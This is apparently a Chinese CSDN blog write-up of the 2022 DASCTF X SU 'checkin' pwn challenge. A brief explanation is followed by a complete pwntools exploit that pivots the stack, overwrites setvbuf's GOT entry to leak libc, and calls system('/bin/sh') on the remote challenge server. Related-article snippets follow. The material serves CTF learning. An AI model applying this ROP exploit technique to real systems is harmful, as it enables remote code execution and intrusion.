2022 DASCTF X SU pwn checkin

最新推荐文章于 2024-03-13 13:37:41 发布
最新推荐文章于 2024-03-13 13:37:41 发布
阅读量429 收藏
点赞数
分类专栏: CTF 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yongbaoii/article/details/123763506
版权

栈溢出16个字节

栈迁移打setvbuf的got表
改成puts泄露libc

利用即可。

from pwn import*
from ctypes import*

lib = cdll.LoadLibrary('libc.so.6')

context.log_level='debug'
context.arch='amd64'
context.os = "linux"

sa = lambda s,n : r.sendafter(s,n)
sla = lambda s,n : r.sendlineafter(s,n)
sl = lambda s : r.sendline(s)
sd = lambda s : r.send(s)
rc = lambda n : r.recv(n)
ru = lambda s : r.recvuntil(s)
ti = lambda: r.interactive()

def debug():
    gdb.attach(r)
    pause()
    
def lg(s,addr):
    print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))


r = remote("node4.buuoj.cn", 25051)
#r = process("./checkin")
elf = ELF('./checkin')
libc = ELF("/lib/x86_64-linux-gnu/libc.so.6") 
#debug()


'''
0x000000000040124c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040124e : pop r13 ; pop r14 ; pop r15 ; ret
0x0000000000401250 : pop r14 ; pop r15 ; ret
0x0000000000401252 : pop r15 ; ret
0x000000000040124b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040124f : pop rbp ; pop r14 ; pop r15 ; ret
0x000000000040113d : pop rbp ; ret
0x0000000000401253 : pop rdi ; ret
0x0000000000401251 : pop rsi ; pop r15 ; ret
0x000000000040124d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040101a : ret
'''
pop_rdi = 0x401253
pop_rsi_r15 = 0x401251
setvbuf_got = elf.got['setvbuf']
setvbuf_plt = elf.plt['setvbuf']
read_got = elf.got['read']
read_plt = elf.plt['read']
leave_ret = 0x4011e2

#debug()
payload = b'a' * 160 + p64(0x404a00 + 0xa0) + p64(0x4011bf)
sd(payload)

sleep(1)

payload = p64(0x404aa0)
payload += p64(pop_rdi) + p64(0)
payload += p64(pop_rsi_r15) + p64(setvbuf_got) + p64(0)
payload += p64(read_plt)
payload += p64(pop_rdi) + p64(read_got)
payload += p64(setvbuf_plt)
payload += p64(0x4011bf)
payload += p64(0x404a00)
payload = payload.ljust(0xa0, b'a')
payload += p64(0x404a00) + p64(leave_ret) 
sd(payload)

sleep(1)
sd("\x50\x84")

libc_base = u64(ru('\x7f') + b'\x00\x00') - libc.sym['read']
system_addr = libc_base + libc.sym['system']
bin_sh = libc_base + 0x1b45bd
lg("libc_base", libc_base)
lg("system_addr", system_addr)

sleep(1)

payload = b'a' * 0x50 + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
payload = payload.ljust(0xa8, b'a') + p64(0x404a00)
sd(payload)

ti()
yongbaoii
关注
专栏目录
DASCTF2022 7月赋能赛 crypto wp(DASCTF2022.07赋能赛Pwn easyheap)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
08-29 406
文章目录DASCTF2022 7月赋能赛 crypto wp sigin ezNTRU NTRURSA
2022 CISCN 初赛pwn完整wp
weixin_46483787的博客
06-09 2254
2022 CISCN 初赛pwn的完整wp
pwn】WMCTF2020 cfgo-CheckIn
Nothing
08-03 2293
拿到二进制后先解UPX,解完后发现程序还是很复杂,发现是cgo,做题的时候不知道有没有这种的插件支持,问了下做逆向的队友,似乎插件版本没有更新到这个版本,静态分析没有进展,先看看远程服务是跑啥的。 一个迷宫,走到旗子的位置就行了,一共100关,一波深搜就行了,解决了100关后出现了。 在二进制中搜索字符串无果,就当blind pwn做了,输入name后程序就退出了,可能存在的漏洞格式化字符串以及溢出,尝试发现没有格式化字符串漏洞,然后尝试溢出。当输入了0x78个字符后发现出现了报错信息。这里报错信息还是
[SCTF2021 pwn] checkin
weixin_52640415的博客
12-27 1057
看上去说登录,以为是最简单的一题后来越作越想放弃,不过其它的也不会,用了半天的时间写了个程序,虽然不可能是预期的。但也算有结果。 先是给了个端口,然后就没有了。登上去提示爆4位sha256,这点没啥难度,由于有用的在后也所以肯定得写个小爆破程序,然后会返回base64编码的程序: from pwn import * import hashlib from base64 import b64decode import os context(arch='amd64') #nc 123.60.82.85
2023 NCTF-PWN-【checkin】(AE64 取非 填满长度显示沙箱避免换行符干扰 1也是write 减少shellcode长度 bug exp )
最新发布
llovewuzhengzi的博客
03-13 1060
如果jnz loop_write后面没有指令,是flag的字符,这个时候不知道为什么会跳转到一个奇怪的地方去,但如果再随便加条指令如pop rax就可以正常跳转了。read每次读一个,write也一样。
2022DASCTF X SU 三月春季挑战赛 checkin ROPgadget进阶使用
qq_65147345的博客
07-17 238
1. 栈迁移至bss段 2. 泄露libc地址,将setvbuf改写成puts,将rdi内容改写成read_got,从而泄露libc 3. 再次通过read函数执行system
2022DASCTF X SU 三月春季挑战赛-reverse-easyre(复现)
ookami6497的博客
04-03 904
先用PE查壳,一开始没看清楚,以为没壳,动调了半天,后来才看到是个ASP壳 用工具脱壳后分析main函数 int __cdecl main(int argc, const char **argv, const char **envp) { _BYTE v4[50]; // [esp+1Ch] [ebp-74h] BYREF _BYTE v5[50]; // [esp+4Eh] [ebp-42h] BYREF _DWORD v6[3]; // [esp+80h] [ebp-10h] BY.
2022DASCTF Apr X FATE 防疫挑战赛WP
LaniakeaHarry的博客
04-24 3520
NEFU-NSILIB下Maple战队分队于4月23日10:00 - 18:00所产WriteUp.
R()P DASCTF十月赛pwn R()P题解
qq_43694952的博客
11-26 478
DASCTF 十月赛pwn R()P wp
[GKCTF 2021]checkin调试与分析
Tokameine的博客
07-23 1500
目前笔者刚刚开始入门PWN,算是通过这题涨了点见识吧 主要函数: int sub_4018C7() { char buf[32]; // [rsp+0h] [rbp-20h] BYREF puts("Please Sign-in"); putchar(62); read(0, s1, 0x20uLL); puts("Please input u Pass"); putchar(62); read(0, buf, 0x28uLL); if ( str...
2022DASCTF X SU 三月春季挑战赛 checkin 各种脚本学习分析
臭nana的博客
04-03 4643
只能溢出0x10个字节,刚好能够覆盖返回地址,所以得利用栈迁移来做 第一种:利用magic_gadget修改got表中setvbuf的值 在64位程序的_do_global_dtors_aux中有这么一个gadget十分有用,可以直接改栈数据magic_gadget:add dword ptr [rbp - 0x3d], ebx ; nop ; ret 利用read函数溢出,迁移栈到bss段上,然后通过一些小gadget调整寄存器的值来达到目的 出处:2022DASCTFXSU三月春季挑战赛-p
2022DASCTF X SU 三月春季挑战赛 WriteUp
mumuzi的博客
03-27 1万+
因为这次团队协作较强,所以就把团队wp直接放了(这句话读不懂也没关系,总之放wp) 文章目录Misc月圆之夜 [mumuzi]什么奇奇怪怪的东西 [mumuzi]Hi!Hecker! [mumuzi,dota_st]问卷CryptoFlowerCipher [mumuzi,Lu1u]Reeasyre[Lu1u]IoTWhat's In The Bits[Lu1u,dota_st,mumuzi]Webezpop[atao]calc[atao]upgdstore(赛后)[atao] Misc 月圆之夜 [mu
强网杯 签到re 签到pwn 题解
qq_41071646的博客
05-27 2024
强网杯给打自闭了 最后也是没有进到第一页 比较可惜 不过手速快 抢到了 先锋的三血 感觉还不错 不得不说强网的反作弊做的真心不错 re 都能每个人的flag 不一样 真心可以 然后强网的 pwn题竟然还有用队伍 token来搞 真的秀 先说re 即可得出flag Just re 这个题目也算是签到题 首先要修复函数 虽然 上面xmmword_405018 变化...
SUctf checkIn
舞动的獾
10-08 555
看了道上传的关于.user.ini的题目,这里试着做一下 题目地址 buuctf checkln 打开题目,出现了简单的上传框 试着上传php文件 更改名称为phps,php3,php4,php5,Php,pphphp,都上传失败. 试试改为jpg 发现它对<?内容进行了检验。 我们可以构造这种形式的木马 <script language="php"> @eval($_P...
ctfshow pwn题学习笔记
Scarehehe的博客
11-30 6214
文章目录pwn入门pwn签到题pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到题 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
PWN-最新checksec的安装和使用
热门推荐
qq_43430261的博客
04-14 1万+
安装 用git安装 $ git clone https://github.com/slimm609/checksec.sh.git 进入文件内 cd checksec.sh 执行下面这条命令,在命令行中建立符号链接就可以在terminal中直接使用了 sudo ln -s checksec /usr/local/bin/checksec #或者sudo ln -sf checksec /us...
one_gadget 下载 安装 与使用
yongbaoii的博客
10-15 8336
00 开始 当有了ROP_gadget之后就会发现one_gadget也是必须的。 one_gadget就是用来去查找动态链接库里execve("/bin/sh", rsp+0x70, environ)函数的地址的,专职。 01 安装 sudo apt -y install ruby sudo gem install one_gadget 02 使用 举个栗子 还是挺简单的。 ...
go pwn 2022 虎符 gogogo
yongbaoii的博客
04-09 7029
刚刚看了17年seccon的baby_stack 看着这个感觉好亲切。
linux 安装codeql环境 (二)codeql database create通过报错分析其流程
yongbaoii的博客
04-10 5896
尝试过很多解决方案之后无果 决定研究一下它的整个流程
2022强网杯pwn赛题详解:基于largebinattack的houseofapple漏洞利用
强网杯2022年的Pwn赛题解析主要聚焦于一道难度较高的题目"house_of_cat",该题挑战者需利用glibc 2.35版本中的漏洞进行攻击,这是当时Ubuntu 22.04系统上最新版glibc。题目吸引了众多参赛队伍,但因涉及高级的_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值